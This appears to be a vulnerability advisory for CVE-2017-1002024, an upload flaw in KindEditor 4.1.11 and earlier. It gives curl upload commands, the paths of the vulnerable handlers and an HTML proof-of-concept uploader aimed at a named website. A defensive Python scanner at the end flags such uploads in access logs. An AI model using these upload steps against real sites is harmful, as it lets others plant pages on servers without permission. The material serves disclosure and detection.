2.05 KB / 2021-07-15 19:55:40
(CVE-2017-1002024) KindEditor <= 4.1.11 file upload vulnerability
=================================================================
    
1. Vulnerability overview
-------------------------

The vulnerability is in the KindEditor editor's bundled upload handler, which accepts uploads of .txt and .html files. The PHP, ASP, JSP and ASP.NET builds are all affected, and the issue is present in KindEditor 4.1.11 and earlier.
    
2. Affected versions
--------------------

KindEditor <= 4.1.11
    
3. Reproduction steps
---------------------

```
curl -F"[email protected]" http://127.0.0.1/kindeditor/php/upload_json.php?dir=file
curl -F"[email protected]" http://127.0.0.1/kindeditor/asp/upload_json.asp?dir=file
curl -F"[email protected]" http://127.0.0.1/kindeditor/jsp/upload_json.jsp?dir=file
curl -F"[email protected]" http://127.0.0.1/kindeditor/aspx/upload_json.aspx?dir=file
```

The response returns the path of the uploaded file.
    
    
    
> Upload handler (JSON endpoint) locations

    /asp/upload_json.asp
    /asp.net/upload_json.ashx
    /jsp/upload_json.jsp
    /php/upload_json.php
    
> Upload URLs

    kindeditor/asp/upload_json.asp?dir=file
    kindeditor/asp.net/upload_json.ashx?dir=file
    kindeditor/jsp/upload_json.jsp?dir=file
    kindeditor/php/upload_json.php?dir=file
    
> Check the version information

    http://www.0-sec.org/kindeditor//kindeditor.js

![](./resource/(CVE-2017-1002024)Kindeditor<=4.1.11上传漏洞/media/rId24.jpg)
    
> Build the PoC

    <html><head>
    <title>Uploader</title>
    <!-- Loads the target's own KindEditor script and reuses its upload button widget -->
    <script src="http://www.0-sec.org/kindeditor//kindeditor.js"></script>
    <script>
    KindEditor.ready(function(K) {
        var uploadbutton = K.uploadbutton({
            button : K('#uploadButton')[0],
            fieldName : 'imgFile',
            url : 'http://www.0-sec.org/kindeditor/jsp/upload_json.jsp?dir=file',
            afterUpload : function(data) {
                // The handler's JSON response carries the stored file's URL
                if (data.error === 0) {
                    var url = K.formatUrl(data.url, 'absolute');
                    K('#url').val(url);
                }
            },
        });
        uploadbutton.fileBox.change(function(e) {
            uploadbutton.submit();
        });
    });
    </script></head><body>
    <div>
    <input class="ke-input-text" type="text" id="url" value="" readonly="readonly" />
    <input type="button" id="uploadButton" value="Upload" />
    </div>
    </body>
    </html>
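As a defender's addition (not part of the original note), the following Python scanner flags POST requests to the upload_json handlers listed above in web-server access logs, marking the dir=file case and tool-driven uploads that carry no Referer. The log lines are constructed samples with placeholder addresses.

```python
import re

# Constructed sample access-log lines (combined log format); the client IPs are
# documentation-range placeholders and none of this comes from the original note.
SAMPLE_LOG = """\
203.0.113.10 - - [15/Jul/2021:19:55:40 +0800] "POST /kindeditor/php/upload_json.php?dir=file HTTP/1.1" 200 87 "-" "curl/7.68.0"
203.0.113.10 - - [15/Jul/2021:19:55:41 +0800] "POST /kindeditor/jsp/upload_json.jsp?dir=file HTTP/1.1" 200 91 "-" "curl/7.68.0"
198.51.100.7 - - [15/Jul/2021:19:56:02 +0800] "GET /kindeditor/kindeditor.js HTTP/1.1" 200 221034 "-" "Mozilla/5.0"
198.51.100.7 - - [15/Jul/2021:19:56:10 +0800] "POST /kindeditor/php/upload_json.php?dir=image HTTP/1.1" 200 88 "http://example.test/editor" "Mozilla/5.0"
192.0.2.5 - - [15/Jul/2021:19:57:00 +0800] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# Combined log format: ip ident user [ts] "METHOD path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# The upload_json handlers the note lists for the PHP, ASP, ASP.NET and JSP builds.
UPLOAD_RE = re.compile(
    r'/kindeditor/(?:php|asp|asp\.net|jsp|aspx)/upload_json\.(?:php|asp|ashx|jsp|aspx)'
    r'(?:\?(?P<qs>[^#]*))?$',
    re.IGNORECASE,
)


def scan(log_text):
    """Return one finding per POST to a KindEditor upload handler, with reasons."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        u = UPLOAD_RE.search(m["path"])
        if not u:
            continue
        reasons = ["POST to KindEditor upload_json handler"]
        params = dict(p.split("=", 1) for p in (u["qs"] or "").split("&") if "=" in p)
        if params.get("dir") == "file":
            reasons.append("dir=file: the directory that accepts .txt/.html on <= 4.1.11")
        if m["referer"] == "-":
            reasons.append("no Referer: upload sent by a tool, not from an editor page")
        if m["status"] == "200":
            reasons.append("handler answered 200, upload likely stored")
        findings.append({"ip": m["ip"], "ts": m["ts"], "path": m["path"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["path"], "|", "; ".join(f["reasons"]))
```

Run it against the real access log of a host that serves KindEditor; hits with dir=file and no Referer are the ones to review first, then inspect the upload directory for .html files.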
    
    